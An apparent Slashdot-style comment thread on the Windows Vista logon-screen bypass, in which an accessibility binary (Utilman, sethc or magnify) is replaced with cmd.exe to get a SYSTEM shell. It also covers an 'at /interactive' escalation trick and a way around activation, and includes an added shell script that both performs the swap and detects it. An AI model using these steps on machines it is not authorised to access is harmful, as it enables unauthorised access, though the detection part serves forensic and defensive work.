Gaining System-Level Access To Vista
An anonymous reader writes "This video shows a method by which a user can use a Linux distro called BackTrack to gain system access to Windows Vista without logging into Windows or knowing the username or password for any accounts. To accomplish this, the user renames cmd.exe to Utilman.exe — this is the program that brings up the Accessibility options for users without sight or with limited vision. The attack takes advantage of the fact that the Utility Manager can be invoked before the user logs into the system. The user gains System access, which is a level higher than Administrator. The person who discovered this security hole claims that XP, 2000, 2003 and NT are not vulnerable to it; only Windows Vista is."
It won't bypass BitLocker if you have to put in a password as soon as you boot, but it might if you have it set up the other way.
Physical access does always mean game over; brute-forcing (most people keep their FDE passwords around 4 characters) and the possibility of plaintext attacks exist on certain blocks.
The interesting thing is that the utility for helping impaired people is run as SYSTEM when it really doesn't have to be. I had wondered about this and thought about doing the same hack before ever even seeing this video; however, I never bothered to do it, since the possibility of messing something up and having to revert it afterwards just seemed too annoying to me.
If I had one dollar for every brain you don't have, I would have $1.
Boot an NTFS-capable live Linux CD, rename magnify.exe to magnify.bak, copy cmd.exe to magnify.exe. Boot to the login screen, press Windows key+U and choose "magnify the screen". System-level access to anything. Also, if you are an admin in Windows XP, just run "at 12:05 /interactive cmd.exe"; at 12:05 a cmd prompt will pop open (BTW, you can use any time, then adjust the system clock). The cmd prompt that pops open will have system-level access. Use taskmgr to kill explorer.exe, then launch explorer from the cmd prompt..... you are now SYSTEM.
I have been using this for years... I was told that MS was going to sign all the EXE files to stop this attack, but guess what..... cmd.exe will still be signed.
People who are surprised by this.... you might also like to know how to get Remote Desktop running on XP Home: http://www.geekport.com/2007/08/15/enabling-remote-desktop-in-xp-home/
It works in XP and 2000... you just have to do the same trick with different file names.
Parent is correct; been doing this in XP for years with C:\windows\system32\sethc.exe (StickyKeys).
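The comments above all describe the same offline swap (magnify.exe, sethc.exe or Utilman.exe replaced by a copy of cmd.exe from a live Linux CD), and the same thing is what an examiner would look for on a seized or suspicious volume. The script below is an added example written for this page, not code from any poster or from the thread, and it does two things: it performs the swap with a backup so it can be reverted, and it checks a volume for the trick by comparing each pre-logon accessibility binary against cmd.exe. Assumptions: the Windows volume is already mounted read-write (for example with ntfs-3g) at the path you pass in, and the system directory sits at Windows/System32 under that mount point; the function and variable names are this example's own. The Windows-side "at /interactive" trick from the earlier comment is not covered, since it runs inside Windows, not from the live CD.

```shell
#!/bin/sh
# Added example: swap a pre-logon accessibility binary for cmd.exe on a mounted
# Windows volume (the trick the thread describes), restore it, and detect it.
# Assumption: $1 is the mount point of the Windows volume and the system
# directory is $1/Windows/System32 (adjust the path if your mount shows
# "WINDOWS/system32"; NTFS is case-insensitive, Linux mounts are not).

# The three binaries named in the thread, all launchable from the logon screen:
# sethc.exe (StickyKeys, Shift x5), utilman.exe / magnify.exe (Windows key+U).
ACCESSIBILITY_BINS="sethc.exe utilman.exe magnify.exe"

# swap_shell ROOT NAME: move NAME to NAME.bak and put a copy of cmd.exe in its
# place. Refuses to run if a backup already exists, so the original is never lost.
swap_shell() {
    sys32="$1/Windows/System32"
    name="$2"
    [ -f "$sys32/cmd.exe" ] || { echo "no cmd.exe under $sys32" >&2; return 1; }
    [ -f "$sys32/$name" ]   || { echo "no $name under $sys32" >&2; return 1; }
    if [ -e "$sys32/$name.bak" ]; then
        echo "$name.bak already exists; restore first" >&2
        return 1
    fi
    mv "$sys32/$name" "$sys32/$name.bak" || return 1
    cp "$sys32/cmd.exe" "$sys32/$name"
}

# restore_shell ROOT NAME: put the backed-up original back.
restore_shell() {
    sys32="$1/Windows/System32"
    name="$2"
    [ -f "$sys32/$name.bak" ] || { echo "no backup for $name" >&2; return 1; }
    mv -f "$sys32/$name.bak" "$sys32/$name"
}

# check_swapped ROOT: the defender's check. Prints every accessibility binary
# that is byte-identical to cmd.exe. Returns 0 if the volume is clean, 1 if any
# binary has been replaced this way. (A swap that uses a different shell or a
# stub launcher will not match; compare against known-good hashes for that.)
check_swapped() {
    sys32="$1/Windows/System32"
    found=0
    for name in $ACCESSIBILITY_BINS; do
        [ -f "$sys32/$name" ] || continue
        if cmp -s "$sys32/cmd.exe" "$sys32/$name"; then
            echo "$name is identical to cmd.exe"
            found=1
        fi
    done
    return $found
}

# Usage (not run when the file is sourced):
#   . ./swapcheck.sh
#   swap_shell /mnt/windows sethc.exe      # before rebooting to the logon screen
#   restore_shell /mnt/windows sethc.exe   # afterwards
#   check_swapped /mnt/windows             # on a volume you are examining
```

The check only catches the exact trick from the thread (a straight copy of cmd.exe); it is a quick triage, not a substitute for hashing the accessibility binaries against a known-good install.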
The article wouldn't have been newsworthy if it had merely said "Vista just as vulnerable, nothing new." Especially since the old tricks are often the first things tried with the new OS.
You can also use similar tricks to work around the Vista activation wizard to install drivers.
When Vista says "activate now or die", tap Shift 5 times, opt to go to the accessibility panel, and now you have an Explorer window running as SYSTEM. You can jump to Control Panel, start up all the networking and Windows Installer services, install those pesky LAN drivers, then exit back and activate Windows.
This works so well now because of the heavy integration of explorer/iexplore and the configuration panel scripts.
...
Instead of using the incredibly painful phone activation, you can use this to install the LAN drivers and activate.
If you're using a pirate copy, there's no pesky activation dialog either, and if you're using a crack, you don't really need LAN drivers to use it, do you?